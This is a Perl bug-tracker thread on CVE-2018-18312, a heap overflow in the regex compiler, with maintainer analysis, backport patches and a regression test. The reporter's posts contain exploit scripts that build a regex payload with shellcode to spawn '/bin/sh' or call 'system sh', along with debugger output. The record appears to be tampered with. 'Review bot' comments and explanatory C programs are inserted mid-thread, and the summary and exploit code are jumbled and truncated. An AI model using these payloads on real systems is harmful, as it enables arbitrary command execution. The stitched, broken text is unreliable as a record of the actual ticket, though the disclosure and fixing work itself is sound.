[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2) #16649
Comments
From @Etsukata
# Summary
- a crafted regular expression can cause heap-buffer-overflow write during
# Affected Versions
- 5.29.1
# PoC
- 5.28.0
==6867== Memcheck, a memory error detector
- 5.26.2 |
From @khwilliamson
I suspect this is a serious security issue. One can position where beyond the end of the buffer gets written by adding \x80's to the ones already there. But I'd be happy to be wrong about this.

The cause is one branch during the parsing leaves the parse pointer positioned one too far, and that causes the backslash to be skipped during pass 2, which causes a ']' to be treated as a metacharacter instead of a literal. The fix is to remove the single line that incorrectly increments the parse pointer.

There is another thing. The minus sign in this case could have been caught as incorrect. But the same out-of-bounds writes would occur if a '^' replaced the minus, and that would be a correct use.

Karl Williamson |
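To make the two-pass mechanism behind Karl's analysis concrete, here is a small constructed C model added for this write-up; it is not code from perl's regcomp.c, and the pattern syntax, node types and function names are invented. Pass 1 sizes the node buffer and pass 2 emits into it; the `skip_escape_bug` flag reproduces the shape of the defect (the parse pointer advanced one too far after an escape, so an escaped `]` is taken as the class terminator). When the two passes disagree, pass 2 needs more nodes than pass 1 allotted, and a bounds check on every emit is what turns that into a rejected compile instead of a write past the buffer.

```c
#include <stdio.h>
#include <stddef.h>

/* Constructed model of a two-pass regex compiler (not perl's regcomp.c):
   pass 1 sizes the node buffer, pass 2 emits nodes into it.  The buffer is
   only safe if both passes agree on where every token ends. */

enum node_kind { NODE_CLASS = 1, NODE_LITERAL = 2 };

struct node { enum node_kind kind; char ch; };   /* ch is set for literals */

struct program {
    struct node *nodes;
    size_t capacity;   /* slots allotted by the sizing pass */
    size_t count;      /* slots written by the emitting pass */
    int overflow;      /* pass 2 needed more slots than pass 1 allotted */
};

/* Parse a bracket class starting at '['.  Returns a pointer just past the
   closing ']' or NULL if unterminated.  With skip_escape_bug set the pointer
   is advanced one too far after a backslash (the shape of the regcomp.c
   defect), so an escaped ']' is taken as the terminator instead of a member. */
static const char *parse_class(const char *p, int skip_escape_bug)
{
    p++;                                   /* step over '[' */
    while (*p) {
        if (*p == '\\') {
            if (!p[1]) return NULL;
            p += skip_escape_bug ? 1 : 2;  /* bug: lands ON the escaped char */
            continue;
        }
        if (*p == ']') return p + 1;
        p++;
    }
    return NULL;
}

/* One pass over the pattern.  prog == NULL means sizing only (count nodes);
   otherwise nodes are written, refusing to step past capacity.  Returns the
   node count, or -1 on a parse error or refused write. */
static long run_pass(const char *pat, int skip_escape_bug, struct program *prog)
{
    long n = 0;
    const char *p = pat;
    while (*p) {
        struct node nd;
        if (*p == '[') {
            const char *end = parse_class(p, skip_escape_bug);
            if (!end) return -1;
            nd.kind = NODE_CLASS;
            nd.ch = 0;
            p = end;
        } else {
            nd.kind = NODE_LITERAL;
            nd.ch = *p++;
        }
        if (prog) {
            if (prog->count >= prog->capacity) { prog->overflow = 1; return -1; }
            prog->nodes[prog->count++] = nd;
        }
        n++;
    }
    return n;
}

/* Nodes a pass would emit for `pat` with the given parser variant. */
long nodes_needed(const char *pat, int skip_escape_bug)
{
    return run_pass(pat, skip_escape_bug, NULL);
}

/* Two-pass compile.  Pass 1 always uses the correct parser; pass 2 uses the
   buggy variant when pass2_bug is set.  Returns 1 on success, 0 when pass 2
   would have written past the buffer pass 1 sized (caught by the bounds
   check instead of corrupting memory), -1 on a parse error. */
int compile_result(const char *pat, int pass2_bug)
{
    static struct node storage[64];
    struct program prog = { storage, 0, 0, 0 };
    long sized = run_pass(pat, 0, NULL);
    if (sized < 0 || sized > 64) return -1;
    prog.capacity = (size_t)sized;
    if (run_pass(pat, pass2_bug, &prog) < 0)
        return prog.overflow ? 0 : -1;
    return 1;
}

int main(void)
{
    /* Constructed pattern: the class [\]ab] contains an escaped literal ']'. */
    const char *pat = "[\\]ab]c";
    printf("consistent parser:   needed=%ld result=%d\n",
           nodes_needed(pat, 0), compile_result(pat, 0));
    printf("pass 2 skips escape: needed=%ld allotted=%ld result=%d\n",
           nodes_needed(pat, 1), nodes_needed(pat, 0), compile_result(pat, 1));
    return 0;
}
```

With a consistent parser both passes see two nodes (the class and the literal `c`); with the skipped escape, pass 2 wants five nodes against two allotted and the compile is refused at the third write. The real fix on this ticket deletes the extra `RExC_parse++`; Karl's later remark that removing the sizing pass eliminates the whole class follows from the same picture, since with a single pass and a growable buffer there is no second interpretation to disagree with.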
The RT System itself - Status changed from 'new' to 'open' |
From @khwilliamson
Resending this as it did not make it to the list: On Wed, 15 Aug 2018 11:01:24 -0700, khw wrote:
|
From @Etsukata
The following code generates a regexp which executes arbitrary command

Limitations:
- must set `execstack -s` to perl

```
# use strict;
# 0xabcd => '\xcd\xab\x00\x00\x00\x00\x00\x00'
# must set `execstack -s` to perl
my $address = 0xa34c7d; # overwrite start address
my $body =
    # xmg_stash($stash_address)
    . '" . "a" x 19 . "' # padding
    # xmg_magic($magic_address)
    # mg_virual($mg_virtual_address)
    # x86_64 shell_code
    . '])a\\\\6"; qr/$r/\'';
my $payload = $prefix . $body;
print $cmd . $payload . "\n";
```

Sample output
```
EXECUTING...
Compiling REx ?aaaaaaaaaaaaaaaaaaa}L?M?<M?H1H?/bin//shPH?WH??B;])a\6/ at -e line 1.
?aaaaaaaaaaaaaaaaaaa}L?M?<M?H1H?/bin//shPH?WH??B;])a\6/ at -e line 1.
Breakpoint 1, S_regatom (pRExC_state=pRExC_state@entry=0x7fffffffcd40,
Breakpoint 2, S_mg_free_struct (sv=sv@entry=0xa34ca5, mg=0xa34ce8) at
```
2018-08-16 12:52 GMT+09:00 Karl Williamson via RT <
|
From @khwilliamson
On 08/27/2018 07:16 AM, Eiichi Tsukata wrote:
Shouldn't this be getting a CVE?
|
From @tonycoz
On Wed, 15 Aug 2018 11:01:24 -0700, khw wrote:
Could you please make patches against blead/maint-5.28/maint-5.26 for this? Thanks, |
From @tonycoz
On Wed, 29 Aug 2018 23:52:16 -0700, public@khwilliamson.com wrote:
I plan to request a CVE ID for this issue in the next couple of days. If anyone has already requested an ID, please let me know. Thanks, |
From @Etsukata
update: this limitation can be reduced by calling Perl_eval_sv with crafted
- code
```
# use strict;
# 0xabcd => '\xcd\xab\x00\x00\x00\x00\x00\x00'
my $cmd = 'gdb -x gdbcmd -q --args
my $addr = 0xbacbfc; # overwrite start addr
# $ nm /path/to/perl | grep Perl_eval_sv
my $body = ''
    # sv($addr) obj
    # sv_flags
    # sv_u.svu_pv : ptr to "system sh"
    # any($addr_sv_any)
    ## xmg_stash($addr_stash)
    # $addr_system_sh
    . "A" x 10 # padding
    # xmg_magic($addr_magic)
my $payload = $prefix . $body;
print $cmd . $payload . "\n";
```
- output
```
[eiichi@x1 exploit]$ gdb -x gdbcmd -q --args
h̺system
h̺system
Breakpoint 1, S_regatom (pRExC_state=0x7fffffffcc80, flagp=0x7fffffffc220,
```
2018-09-24 (Mon) 15:41 Tony Cook via RT <
|
From @khwilliamson
On 09/19/2018 06:28 PM, Tony Cook via RT wrote:
Attached |
From @khwilliamson
Attachment 0242-PATCH-perl-133423-for-5.26-maint.patch (the attachment bytes were mis-decoded in RT and are unreadable here; a readable copy is reattached by @tonycoz below) |
From @khwilliamson
Attachment 0003-PATCH-perl-133423-for-maint-5.28.patch (the attachment bytes were mis-decoded in RT and are unreadable here; a readable copy is reattached by @tonycoz below) |
From @tonycoz
On Mon, 24 Sep 2018 11:01:56 -0700, public@khwilliamson.com wrote:
Thanks, though they seem to be corrupted in RT, trying again. Tony |
From @tonycoz
0003-PATCH-perl-133423-for-maint-5.28.patch
From 048958aa54379e02093268f851b55b3de3b475fe Mon Sep 17 00:00:00 2001
From: Karl Williamson <khw@cpan.org>
Date: Mon, 24 Sep 2018 11:55:55 -0600
Subject: [PATCH 3/3] PATCH: [perl #133423] for maint 5.28
---
regcomp.c | 1 -
t/re/reg_mesg.t | 3 +++
2 files changed, 3 insertions(+), 1 deletion(-)
diff --git a/regcomp.c b/regcomp.c
index f694ff7f8b..e1da15a77c 100644
--- a/regcomp.c
+++ b/regcomp.c
@@ -15591,7 +15591,6 @@ redo_curchar:
if (UCHARAT(RExC_parse) != ')')
vFAIL("Expecting close paren for wrapper for nested extended charclass");
- RExC_parse++;
RExC_flags = save_flags;
goto handle_operand;
}
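Review bot: the commit message (subject only, "PATCH: [perl #133423] for maint 5.28") does not say what the one-line deletion fixes; it should record the cause given in the ticket, namely that this branch left RExC_parse one past the ')' so pass 2 skipped the following backslash and treated a literal ']' as the class terminator, producing writes beyond the regnode buffer sized by pass 1. A one-line comment above `RExC_flags = save_flags;` stating that RExC_parse is intentionally left on the ')' verified by the `if` above would also protect the fix from being "corrected" back by a later reader.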
diff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t
index 5fb1f1a46c..2880be45eb 100644
--- a/t/re/reg_mesg.t
+++ b/t/re/reg_mesg.t
@@ -122,6 +122,8 @@ my $tab_hex = sprintf "%02X", ord("\t");
#
# The first set are those that should be fatal errors.
+my $bug133423 = "(?[(?^:(?[\\\x00]))\\]\x00|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670";
+
my @death =
(
'/[[=foo=]]/' => 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',
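Review bot: `my $bug133423 = ...` is inserted between the comment `# The first set are those that should be fatal errors.` and the `my @death =` declaration that comment describes; moving the assignment above the `#` comment block keeps the comment attached to @death. A short comment saying why the string carries the long run of `\x80` bytes (per the ticket they are what pushed the write past the buffer, so trimming them would weaken the regression test) would stop the next person from "tidying" it.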
@@ -307,6 +309,7 @@ my @death =
'/\A{/' => 'Unescaped left brace in regex is illegal here {#} m/\A{{#}/',
'/(?<=/' => 'Sequence (?... not terminated {#} m/(?<={#}/', # [perl #128170]
'/\p{vertical � tab}/' => 'Can\'t find Unicode property definition "vertical � tab" {#} m/\\p{vertical � tab}{#}/', # [perl #132055]
+ "/$bug133423/" => "Operand with no preceding operator {#} m/(?[(?^:(?[\\�]))\\{#}]�|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670/",
);
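Review bot: the expected message on the `+ "/$bug133423/"` line embeds the raw NUL and \x80 bytes (they render as � here), whereas `$bug133423` two hunks up spells them as `\x00`/`\x80` escapes; writing the expected string the same way keeps the file readable and survives copy/paste, which matters given these patches were already corrupted once in transit on this ticket. The `{#}` marker sits after `\\` and before `]`, i.e. at the backslash whose skipping caused the mis-parse, which is the right place for the error to be reported.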
--
2.17.1
|
From @tonycoz
0242-PATCH-perl-133423-for-5.26-maint.patch
From df2858ea28eb2c7e00a4bd6a5ed95e4782f88333 Mon Sep 17 00:00:00 2001
From: Karl Williamson <khw@cpan.org>
Date: Mon, 24 Sep 2018 11:54:41 -0600
Subject: [PATCH 242/242] PATCH: [perl #133423] for 5.26 maint
---
regcomp.c | 1 -
t/re/reg_mesg.t | 4 ++++
2 files changed, 4 insertions(+), 1 deletion(-)
diff --git a/regcomp.c b/regcomp.c
index ca47db7573..431006e855 100644
--- a/regcomp.c
+++ b/regcomp.c
@@ -15109,7 +15109,6 @@ redo_curchar:
RExC_parse++;
assert(UCHARAT(RExC_parse) == ')');
- RExC_parse++;
RExC_flags = save_flags;
goto handle_operand;
}
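Review bot: in this 5.26 variant the character after `RExC_parse++` is only checked with `assert(UCHARAT(RExC_parse) == ')')`, whereas the 5.28 patch on this ticket uses `if (...) vFAIL("Expecting close paren ...")`; an assert is compiled out in non-DEBUGGING builds, so a pattern reaching this branch without a ')' would continue parsing silently there. Consider carrying the vFAIL form back to 5.26 along with the deleted increment, so the malformed input is rejected in production builds too.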
diff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t
index 39cfcf7df1..d26a7caf37 100644
--- a/t/re/reg_mesg.t
+++ b/t/re/reg_mesg.t
@@ -106,6 +106,8 @@ my $high_mixed_digit = ('A' lt '0') ? '0' : 'A';
my $colon_hex = sprintf "%02X", ord(":");
my $tab_hex = sprintf "%02X", ord("\t");
+my $bug133423 = "(?[(?^:(?[\\\x00]))\\]\x00|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670";
+
##
## Key-value pairs of code/error of code that should have fatal errors.
##
@@ -290,6 +292,8 @@ my @death =
'/(?xmsixp)abc/' => "",
'/(?xxxx:abc)/' => "",
'/(?<=/' => 'Sequence (?... not terminated {#} m/(?<={#}/', # [perl #128170]
+ "/$bug133423/" => "Operand with no preceding operator {#} m/(?[(?^:(?[\\�]))\\{#}]�|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670/",
+
);
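Review bot: the second added line (a bare `+` with nothing on it, just before `);`) introduces a blank line inside the @death list that the 5.28 version of this patch does not have; drop it so the maint-5.26 and maint-5.28 test files stay in step and the diff is limited to the regression case.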
--
2.17.1
|
From @tonycoz
On Mon, 24 Sep 2018 11:01:56 -0700, public@khwilliamson.com wrote:
Do you have a similar patch for blead? I managed to forward-port the 5.28 patch, but the error message isn't matching in the test, I don't know if that's due to some other change or not. Tony |
From @khwilliamson
On 10/01/2018 10:35 PM, Tony Cook via RT wrote:
I don't know why that would be. Attached is a blead patch that passes |
From @khwilliamson
Attachment 0001-PATCH-perl-133423.patch (the attachment bytes were mis-decoded in RT and are unreadable here; a readable copy is reattached by @tonycoz below) |
From @tonycoz
On Tue, 02 Oct 2018 06:34:41 -0700, public@khwilliamson.com wrote:
I think it might have been because I was copying and pasting from the patch in the browser rather than from the file. And the new patch was garbled too - I see a bunch of Chinese characters when I view it in the browser (which thinks it's UTF-8.) If I dump the bytes I see:
00000000 e4 99 b2 e6 bd ad e2 81 a5 e6 90 b6 e6 84 b9 e6 |................|
at the start. I've attached the copy that came via email, to ensure we have a readable copy on the ticket. Tony |
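The byte dump above is the classic double mis-encoding: the patch's ASCII was read two bytes at a time as UTF-16BE code units (`46 72`, i.e. 'F','r', becomes U+4672) and the resulting CJK text was then re-encoded as UTF-8. As an added example that is not part of the ticket, the following C program decodes such a stream and recovers the original bytes; the sample input is the first fifteen bytes Tony listed (the trailing `e6` is an incomplete sequence and is left out). The UTF-8 decoder is written here from the RFC 3629 byte patterns and is not perl's or git's code.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: the first 15 bytes of the hexdump quoted in the
   ticket (five complete 3-byte UTF-8 sequences). */
const unsigned char SAMPLE_DUMP[] = {
    0xe4, 0x99, 0xb2,   /* U+4672 -> 'F' 'r' */
    0xe6, 0xbd, 0xad,   /* U+6F6D -> 'o' 'm' */
    0xe2, 0x81, 0xa5,   /* U+2065 -> ' ' 'e' */
    0xe6, 0x90, 0xb6,   /* U+6436 -> 'd' '6' */
    0xe6, 0x84, 0xb9    /* U+6139 -> 'a' '9' */
};
#define SAMPLE_DUMP_LEN (sizeof SAMPLE_DUMP)

/* Decode one UTF-8 sequence from s[0..len). Stores the code point in *cp and
   returns the bytes consumed, or 0 if the sequence is malformed, truncated,
   overlong, a surrogate, or above U+10FFFF. */
static size_t utf8_decode(const unsigned char *s, size_t len, unsigned long *cp)
{
    static const unsigned long min_for_len[5] = { 0, 0, 0x80, 0x800, 0x10000 };
    size_t n;
    unsigned long c;
    if (len == 0) return 0;
    if (s[0] < 0x80) { *cp = s[0]; return 1; }
    if ((s[0] & 0xE0) == 0xC0)      { n = 2; c = s[0] & 0x1F; }
    else if ((s[0] & 0xF0) == 0xE0) { n = 3; c = s[0] & 0x0F; }
    else if ((s[0] & 0xF8) == 0xF0) { n = 4; c = s[0] & 0x07; }
    else return 0;
    if (len < n) return 0;
    for (size_t i = 1; i < n; i++) {
        if ((s[i] & 0xC0) != 0x80) return 0;
        c = (c << 6) | (s[i] & 0x3F);
    }
    if (c < min_for_len[n] || c > 0x10FFFF || (c >= 0xD800 && c <= 0xDFFF))
        return 0;
    *cp = c;
    return n;
}

/* Undo the double mis-encoding: each BMP code point in the UTF-8 input was
   originally two bytes read as one UTF-16BE unit, so emit them high byte
   first. Returns bytes recovered, or -1 if the input is not of that shape. */
long recover_utf16be_misdecode(const unsigned char *in, size_t len,
                               char *out, size_t outcap)
{
    size_t pos = 0, n = 0;
    while (pos < len) {
        unsigned long cp;
        size_t used = utf8_decode(in + pos, len - pos, &cp);
        if (used == 0 || cp > 0xFFFF) return -1;  /* not a BMP code unit */
        if (n + 2 > outcap) return -1;
        out[n++] = (char)(cp >> 8);
        out[n++] = (char)(cp & 0xFF);
        pos += used;
    }
    return (long)n;
}

/* Recover into a NUL-terminated string; NULL on failure. */
const char *recover_to_string(const unsigned char *in, size_t len,
                              char *buf, size_t cap)
{
    long n = recover_utf16be_misdecode(in, len, buf, cap - 1);
    if (n < 0) return NULL;
    buf[n] = '\0';
    return buf;
}

/* 1 if the recovered text equals `expected`, 0 otherwise (including when
   the input cannot be recovered at all). */
int recover_matches(const unsigned char *in, size_t len, const char *expected)
{
    char buf[256];
    const char *s = recover_to_string(in, len, buf, sizeof buf);
    return s != NULL && strcmp(s, expected) == 0;
}

int main(void)
{
    char buf[64];
    const char *s = recover_to_string(SAMPLE_DUMP, SAMPLE_DUMP_LEN, buf, sizeof buf);
    printf("%s\n", s ? s : "(not a mis-decoded UTF-16BE stream)");
    return 0;
}
```

The recovered prefix is `From ed6a9`, the start of the blead patch's commit line, which is how one can tell the attachment was intact before the web interface mangled it. Anything that is not a well-formed BMP sequence makes the recovery refuse rather than guess, so a truncated dump or genuinely binary input is reported as unrecoverable instead of producing plausible-looking garbage.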
From @tonycoz
0001-PATCH-perl-133423.patch
From ed6a9e8f196c5fa9b9159e1a753436c10715d4f4 Mon Sep 17 00:00:00 2001
From: Karl Williamson <khw@cpan.org>
Date: Mon, 24 Sep 2018 11:16:14 -0600
Subject: [PATCH] PATCH: [perl #133423]
---
regcomp.c | 1 -
t/re/reg_mesg.t | 3 +++
2 files changed, 3 insertions(+), 1 deletion(-)
diff --git a/regcomp.c b/regcomp.c
index b303c6284a..18dbf1c309 100644
--- a/regcomp.c
+++ b/regcomp.c
@@ -15615,7 +15615,6 @@ redo_curchar:
if (UCHARAT(RExC_parse) != ')')
vFAIL("Expecting close paren for wrapper for nested extended charclass");
- RExC_parse++;
RExC_flags = save_flags;
goto handle_operand;
}
diff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t
index 36b674746f..a84394a0a7 100644
--- a/t/re/reg_mesg.t
+++ b/t/re/reg_mesg.t
@@ -122,6 +122,8 @@ my $tab_hex = sprintf "%02X", ord("\t");
#
# The first set are those that should be fatal errors.
+my $bug133423 = "(?[(?^:(?[\\\x00]))\\]\x00|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670";
+
my @death =
(
'/[[=foo=]]/' => 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',
@@ -310,6 +312,7 @@ my @death =
'/\p{Latin}{,4 }/' => 'Unescaped left brace in regex is illegal here {#} m/\p{Latin}{{#},4 }/',
'/(?<=/' => 'Sequence (?... not terminated {#} m/(?<={#}/', # [perl #128170]
'/\p{vertical � tab}/' => 'Can\'t find Unicode property definition "vertical � tab" {#} m/\\p{vertical � tab}{#}/', # [perl #132055]
+ "/$bug133423/" => "Operand with no preceding operator {#} m/(?[(?^:(?[\\�]))\\{#}]�|2[^^]\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80\x80])R.\\670/",
);
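Review bot: this test hunk carries the same expected message as the maint-5.28 patch, but earlier in the thread the forward-ported 5.28 test was reported as not matching on blead; before applying, run t/re/reg_mesg.t on current blead and confirm the `{#}` position and the message text produced there, since a message-format change elsewhere would make this regression test fail for the wrong reason.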
--
2.17.1
|
From @tonycoz
On Sun, Oct 07, 2018 at 05:44:57PM -0700, Tony Cook via RT wrote:
Trying via email to see if it happens for me too. Tony |
From @tonycoz
0001-PATCH-perl-133423.patch (identical copy of the attachment above, sent again via email) |
From @tonycoz
On Sun, 23 Sep 2018 23:41:05 -0700, tonyc wrote:
This is CVE-2018-18312. |
From @tonycoz
On Tue, 02 Oct 2018 06:34:41 -0700, public@khwilliamson.com wrote:
For anyone following along, the blead patch is no longer relevant, due to the sizing pass removal (maint will still need their patches applied.) Tony |
From @khwilliamson
On Sat, 20 Oct 2018 20:52:49 -0700, tonyc wrote:
Actually the blead patch is relevant to fixing a bug; it's just that it is no longer a security threat. I'll wait to apply the patch, and other relevant ones until the maintenance releases are done. Removing the sizing pass should remove this entire class of errors from being security issues. |
From @steve-m-hay
Moved to public queue with the release of 5.26.3 and 5.28.1. |
From @khwilliamson
Now fixed. Note that this actually got fixed as a security issue in blead earlier than the commit listed |
@khwilliamson - Status changed from 'open' to 'pending release' |
From @khwilliamson
Thank you for filing this report. You have helped make Perl better.
With the release today of Perl 5.30.0, this and 160 other issues have been
Perl 5.30.0 may be downloaded via:
If you find that the problem persists, feel free to reopen this ticket. |
@khwilliamson - Status changed from 'pending release' to 'resolved' |
Migrated from rt.perl.org#133423 (status was 'resolved')
Searchable as RT133423$